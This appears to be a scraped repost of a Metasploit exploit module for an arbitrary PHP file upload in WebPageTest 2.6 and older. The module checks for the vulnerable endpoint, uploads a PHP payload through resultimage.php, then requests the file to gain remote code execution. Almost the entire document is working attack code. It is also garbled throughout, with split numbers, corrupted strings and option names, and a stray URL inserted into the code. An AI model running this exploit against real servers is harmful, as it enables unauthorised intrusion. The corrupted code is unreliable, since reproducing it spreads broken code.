WebPageTest arbitrary php file upload-vulnerability warning-the black bar safety net

2012-08-07T00:00:00
ID MYHACK58:62201234561
Type myhack58
Reporter 佚名
Modified 2012-08-07T00:00:00

Description

This file is part of the Metasploit Framework and may be subject to

redistribution and commercial restrictions. Please see the Metasploit

Framework web site for more information on licensing and terms of use.

http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})

super(update_info(info,

'Name' => "WebPageTest Arbitrary PHP File Upload",

'Description' => %q{

This module exploits a vulnerability found in WebPageTest's Upload Feature. By

default, the resultimage. phpfile does not verify the user-supplied item before

saving it to disk, and then places this item in the web directory accessable by

the remote users. This flaw can be abused to gain remote code execution.

},

'License' => MSF_LICENSE,

'Author' =>

[

'dun', #Discovery, PoC

'sinn3r' #Metasploit

],

'References' =>

[

['OSVDB', '8 3 8 2 2'],

['EDB', '1 9 7 9 0']

],

'Payload' =>

{

'BadChars' => "\x00"

},

'DefaultOptions' =>

{

'ExitFunction' => "none"

},

'Platform' => ['php'],

'Arch' => ARCH_PHP,

'Targets' =>

[

['WebPageTest v2. 6 or older', {}]

],

'Privileged' => false,

'DisclosureDate' => "Jul 1 3 2 0 1 2",

'DefaultTarget' => 0))

register_options(

[

OptString. new('either the targeturi parameter', [true, 'The base path to WebPageTest', '/www/'])

], self.class)

end

def check

peer = "#{rhost}:#{rport}"

target_uri. path << '/' if target_uri. path[-1,1] != '/'

base = File. dirname("#{target_uri. path}.")

res1 = send_request_raw({'uri'=>"#{base}/index.php"})

res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"})

if res1 and res1. body =~ /WebPagetest \- Website Performance and Optimization Test/ and

res2 and res2. code == 2 0 0

return Exploit::CheckCode::Vulnerable

end

return Exploit::CheckCode::Safe

end

def on_new_session(cli)

if cli. type != "meterpreter"

print_error("No automatic cleanup for you. Please manually remove: #{@target_path}")

return

end

cli. core. use("stdapi") if not cli. ext. aliases. the include? ("stdapi")

cli. fs. file. rm(@target_path)

print_status("#{@target_path} removed")

end

def exploit

peer = "#{rhost}:#{rport}"

target_uri. path << '/' if target_uri. path[-1,1] != '/'

base = File. dirname("#{target_uri. path}.")

p = payload. encoded

fname = "blah.php"

data = Rex::MIME::Message. new

data. add_part(

"<? php #{p} ?& gt;", #Data is our payload

'multipart/form-data', #Content Type

nil, #Transfer Encoding

"form-data; name=\"file\"; filename=\"#{fname}\"" msgstr "" #Content Disposition

)

print_status("#{peer} - Uploading payload (#{p. length. to_s} bytes)...")

res = send_request_cgi({

'method' => 'POST',

'uri' => "#{base}/work/resultimage.php",

'ctype' => "multipart/form-data; boundary=#{data. bound}",

'data' => data. to_s

})

if not res

print_error("#{peer} - No response from host")

return

end www.xxxxo.com

@target_path = "#{base}/results/#{fname}"

print_status("#{peer} - Requesting #{@target_path}")

res = send_request_cgi({'uri'=>@target_path})

handler

if res and res. code == 4 0 4

print_error("#{peer} - Payload failed to upload")

end

end

end